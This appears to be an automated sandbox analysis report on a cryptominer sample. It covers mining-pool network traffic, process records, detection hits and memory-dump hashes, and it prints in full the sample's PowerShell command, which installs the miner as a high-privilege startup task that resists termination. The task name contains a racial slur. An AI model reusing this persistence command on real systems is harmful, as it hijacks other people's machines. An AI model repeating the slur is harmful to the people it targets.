                                                                                      Feb 18, 2024 19:39:17.771331072 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      Feb 18, 2024 19:39:17.771548986 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      Feb 18, 2024 19:39:17.865555048 CET | 10128 | 49712 | 44.196.193.227 | 192.168.2.5
                                                                                      Feb 18, 2024 19:39:17.866103888 CET | 10128 | 49712 | 44.196.193.227 | 192.168.2.5
                                                                                      Feb 18, 2024 19:39:17.919338942 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      Feb 18, 2024 19:42:00.068768024 CET | 10128 | 49712 | 44.196.193.227 | 192.168.2.5
                                                                                      Feb 18, 2024 19:42:00.231409073 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      Feb 18, 2024 19:42:15.463208914 CET | 10128 | 49712 | 44.196.193.227 | 192.168.2.5
                                                                                      Feb 18, 2024 19:42:15.528337002 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      Feb 18, 2024 19:43:00.058094025 CET | 10128 | 49712 | 44.196.193.227 | 192.168.2.5
                                                                                      Feb 18, 2024 19:43:00.231277943 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      UDP packets
                                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Feb 18, 2024 19:39:17.569380999 CET | 65060 | 53 | 192.168.2.5 | 1.1.1.1
                                                                                      Feb 18, 2024 19:39:17.673299074 CET | 53 | 65060 | 1.1.1.1 | 192.168.2.5
                                                                                      DNS queries
                                                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                      Feb 18, 2024 19:39:17.569380999 CET | 192.168.2.5 | 1.1.1.1 | 0x4121 | Standard query (0) | gulf.moneroocean.stream | A (IP address) | IN (0x0001) | false
                                                                                      DNS answers
                                                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                      Feb 18, 2024 19:39:17.673299074 CET | 1.1.1.1 | 192.168.2.5 | 0x4121 | No error (0) | gulf.moneroocean.stream | monerooceans.stream | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                                      Feb 18, 2024 19:39:17.673299074 CET | 1.1.1.1 | 192.168.2.5 | 0x4121 | No error (0) | monerooceans.stream | - | 44.196.193.227 | A (IP address) | IN (0x0001) | false

                                                                                      Target ID:0
                                                                                      Start time:19:38:55
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      Imagebase:0x7ff68af50000
                                                                                      File size:5'827'072 bytes
                                                                                      MD5 hash:7E78C4388E398CD5113BE95855753C9A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:19:38:55
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:19:38:55
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:19:39:02
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Program Files\MINA\m.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Program Files\MINA\m.exe
                                                                                      Imagebase:0x7ff7c87f0000
                                                                                      File size:5'827'072 bytes
                                                                                      MD5 hash:7E78C4388E398CD5113BE95855753C9A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 53%, ReversingLabs
                                                                                      • Detection: 62%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:19:39:03
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:19:39:03
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:19:39:15
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\conhost.exe
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:11
                                                                                      Start time:19:39:15
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:19:39:15
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:19:39:16
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                      Imagebase:0x7ff674740000
                                                                                      File size:5'141'208 bytes
                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:16
                                                                                      Start time:19:39:34
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Program Files\MINA\m.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Program Files\MINA\m.exe
                                                                                      Imagebase:0x7ff7c87f0000
                                                                                      File size:5'827'072 bytes
                                                                                      MD5 hash:7E78C4388E398CD5113BE95855753C9A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:17
                                                                                      Start time:19:39:34
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff6068e0000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:18
                                                                                      Start time:19:39:34
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2089628243.00007FF68AF51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68AF50000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2089585408.00007FF68AF50000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2089699361.00007FF68AF6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2089745256.00007FF68AF6C000.00000008.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2090194042.00007FF68B4D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2090253830.00007FF68B4D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2090279914.00007FF68B4E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2090299139.00007FF68B4E5000.00000008.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2090317611.00007FF68B4E6000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff68af50000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction ID: 91e00c69e8aa0ec2ef1d46d807cddab4cb1d34da75d5374665b36a30f43b8dd6
                                                                                        • Opcode Fuzzy Hash: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction Fuzzy Hash: 45B01230D0530AE4E3003F11E84226C32207F0AB80F418074D80C43363CE7C6440CB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/&I
                                                                                        • API String ID: 0-3048473677
                                                                                        • Opcode ID: dd0490390fbbf2de29876a047170c0fb1be9ba3c638c6e80671cd0d5ddaf5984
                                                                                        • Instruction ID: db8ce0a42027081bc7c55cf2933bf3690faf75086ec51a0ee0e72eb37fb595f7
                                                                                        • Opcode Fuzzy Hash: dd0490390fbbf2de29876a047170c0fb1be9ba3c638c6e80671cd0d5ddaf5984
                                                                                        • Instruction Fuzzy Hash: 7751E532E1DA864FEBA9EE2C745127577D1EF95260B1901FAC00EC7193FE18EC05835A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/&I
                                                                                        • API String ID: 0-3048473677
                                                                                        • Opcode ID: b694dc691f9f3148146ca1b67b7d5c0957ae244db2dff90b1fc36a110c451ccd
                                                                                        • Instruction ID: f12af3ddc86a119ea14fe00d3b1c3229917e215d88f9ce3aebb92dbd7c106a3d
                                                                                        • Opcode Fuzzy Hash: b694dc691f9f3148146ca1b67b7d5c0957ae244db2dff90b1fc36a110c451ccd
                                                                                        • Instruction Fuzzy Hash: F8218C32E0E9864FEBB9EE19749117876D1EF55360B4901FAC01EC71A3FE18EC04824A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13e5cf013b8449a07a92b445ff6eea734da411703010ec591e3c262d4933ef63
                                                                                        • Instruction ID: 07f3bf82b7db801055b231d8c26f85c5fb03fabe23e52834f6fef7a46ad350c5
                                                                                        • Opcode Fuzzy Hash: 13e5cf013b8449a07a92b445ff6eea734da411703010ec591e3c262d4933ef63
                                                                                        • Instruction Fuzzy Hash: 1C31063191CB8C4FDB59DB5C984A6A97BE0FB69320F00426FE449C3292DB74A855CBC2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083152471.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848e1d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e0d60b69cf5de6206c746e2dad754b5f140aa130871ede5b353491ecf34a718
                                                                                        • Instruction ID: 6ef4cf02fa872fc5dc030493c26f53bfba01d87a1753f567a3cf244eb48072e2
                                                                                        • Opcode Fuzzy Hash: 3e0d60b69cf5de6206c746e2dad754b5f140aa130871ede5b353491ecf34a718
                                                                                        • Instruction Fuzzy Hash: AD41E47080DBC54FE7969B29A8559523FF0FF56320F1506DFE088CB1A3DB29A846C792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f0b83f2baaa0d1927354afac4c6fe0e3a13af3dfe05f1a7a885ddd01d31d4b64
                                                                                        • Instruction ID: 3e376e4264c819886160e7a5ae580ebe2578dfe782626858d7e22aa7299ce17f
                                                                                        • Opcode Fuzzy Hash: f0b83f2baaa0d1927354afac4c6fe0e3a13af3dfe05f1a7a885ddd01d31d4b64
                                                                                        • Instruction Fuzzy Hash: D921387080C78C4FEB098BA888496F97FE4EB52321F04816FD489DB193DA795846CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d0e3361d74d2ee27645d0f2256e5238b1b89f9cb8af1d851f9524dd22a4e15d4
                                                                                        • Instruction ID: da0ab9a792387c2c004f979605ca81458b013f9dbe94d995e4fec795a793a81b
                                                                                        • Opcode Fuzzy Hash: d0e3361d74d2ee27645d0f2256e5238b1b89f9cb8af1d851f9524dd22a4e15d4
                                                                                        • Instruction Fuzzy Hash: 1901677111CB0C4FD744EF4CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f7986efcef492a43f845e269457951a10d8592f5f2a7952b6dfe3bd241820851
                                                                                        • Instruction ID: 4be3acdb558113d00afa57db441470d60f58329ae2bc27487d9c48a561804c87
                                                                                        • Opcode Fuzzy Hash: f7986efcef492a43f845e269457951a10d8592f5f2a7952b6dfe3bd241820851
                                                                                        • Instruction Fuzzy Hash: 47F0963180CA898FDB06AF2488555D97FA0FF16350F0502DBD458C70B2DB759598CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 46cb4bb16b60e4a2483eadfb4c6f636df5d8f34be52a362f3a2d88bdbdfb4582
                                                                                        • Instruction ID: dcec76ead6cf07a09e72f9da91a4bd0ea61443a275f8b1f359c515f21cbd28a1
                                                                                        • Opcode Fuzzy Hash: 46cb4bb16b60e4a2483eadfb4c6f636df5d8f34be52a362f3a2d88bdbdfb4582
                                                                                        • Instruction Fuzzy Hash: C9F0903190D5858FDB54EF5CB4459A477E0FF05360B0500F6E05DC7063EA25EC50C759
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 393054673aaac17d236322916cb3243088f6af9ee1bab0532926767c94a3d112
                                                                                        • Instruction ID: c70b592fd9fa301b2328f6de6db466d1846c87152b1aba27e2c41489159abbba
                                                                                        • Opcode Fuzzy Hash: 393054673aaac17d236322916cb3243088f6af9ee1bab0532926767c94a3d112
                                                                                        • Instruction Fuzzy Hash: FBF0373171CF044FD744EE1DD445665B7D1FBA8355F10452FE44DC3651DB25E4818786
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "I$0"I$8"I$@"I$P"I$X"I$`"I$h"I$x"I$"I$"I
                                                                                        • API String ID: 0-2863176668
                                                                                        • Opcode ID: bf1d09415bfc6946bb80d8cdddb831585765383dd1766dedd6b20d5c80a7ddce
                                                                                        • Instruction ID: cc7192cf01e09a4c3887d68aed2bdd81a9f90c1b9171c5296d3a8b76e62c852f
                                                                                        • Opcode Fuzzy Hash: bf1d09415bfc6946bb80d8cdddb831585765383dd1766dedd6b20d5c80a7ddce
                                                                                        • Instruction Fuzzy Hash: C922E563F0EDC24FE26527BC3C161B92BA1FFD66A1B4902F7C148470DF5929AD0642CA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2224902891.00007FF7C87F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C87F0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2224865585.00007FF7C87F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225609775.00007FF7C8D79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225628244.00007FF7C8D82000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225710135.00007FF7C8D85000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225729864.00007FF7C8D86000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7c87f0000_m.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction ID: c95c0960fa9f226abc89712c7ac0fbbf279e4fcd678eaf33d5fd907b796f69bb
                                                                                        • Opcode Fuzzy Hash: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction Fuzzy Hash: 8BB0123090430988E3013F43E841258F3207B0DB60FC24030D80C13392CF7D90404739
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.4%
Total number of Nodes: 1101
Total number of Limit Nodes: 9
10497 7ff6b2981880 7 API calls 10495->10497 10495->10498 10496->10492 10499 7ff6b2981900 2 API calls 10496->10499 10497->10498 10498->10480 10499->10496 10501 7ff6b29818b0 localeconv 10500->10501 10503 7ff6b298188f 10500->10503 10502 7ff6b29863e0 6 API calls 10501->10502 10502->10503 10503->10498 10505 7ff6b298166c 10504->10505 10506 7ff6b2981775 10504->10506 10505->10506 10515 7ff6b298168f 10505->10515 10507 7ff6b29817ba fwprintf 10506->10507 10508 7ff6b2981788 10506->10508 10511 7ff6b29817a1 10507->10511 10509 7ff6b2981795 fwprintf 10508->10509 10510 7ff6b29817ce fwprintf 10508->10510 10509->10511 10510->10511 10511->10484 10512 7ff6b29816cb strlen 10514 7ff6b29863e0 6 API calls 10512->10514 10513 7ff6b29816a9 10513->10484 10514->10515 10515->10512 10515->10513 10912 7ff6b29882d3 10923 7ff6b2988330 10912->10923 10914 7ff6b29882db 10915 7ff6b2988330 16 API calls 10914->10915 10916 7ff6b29882e0 10915->10916 10917 7ff6b29882e8 10916->10917 10931 7ff6b297eb70 RtlCaptureContext RtlUnwindEx abort 10916->10931 10932 7ff6b29884d0 10917->10932 10924 7ff6b2988339 10923->10924 10925 7ff6b2988366 10924->10925 10926 7ff6b2987ff0 16 API calls 10924->10926 10925->10914 10927 7ff6b29883b1 10926->10927 10928 7ff6b29883f0 10927->10928 10937 7ff6b2987410 10927->10937 10933 7ff6b29884da 10932->10933 10934 7ff6b2987ff0 16 API calls 10933->10934 10936 7ff6b2988150 16 API calls 10933->10936 10946 7ff6b297ec20 10933->10946 10934->10933 10936->10933 10944 7ff6b298742c 10937->10944 10938 7ff6b297e5a0 WaitForSingleObject 10938->10944 10939 7ff6b2987564 10941 7ff6b29878c0 16 API calls 10939->10941 10940 7ff6b2987513 10940->10914 10943 7ff6b2987569 10941->10943 10942 7ff6b297e610 ReleaseSemaphore 10942->10944 10944->10938 10944->10939 10944->10940 10944->10942 10945 7ff6b29878f0 16 API calls 10944->10945 10945->10944 10947 7ff6b297ec2b 10946->10947 10948 7ff6b297ec35 10946->10948 10952 7ff6b297eb20 RaiseException 10947->10952 10951 7ff6b297ec30 abort 10948->10951 10953 7ff6b297e7b0 
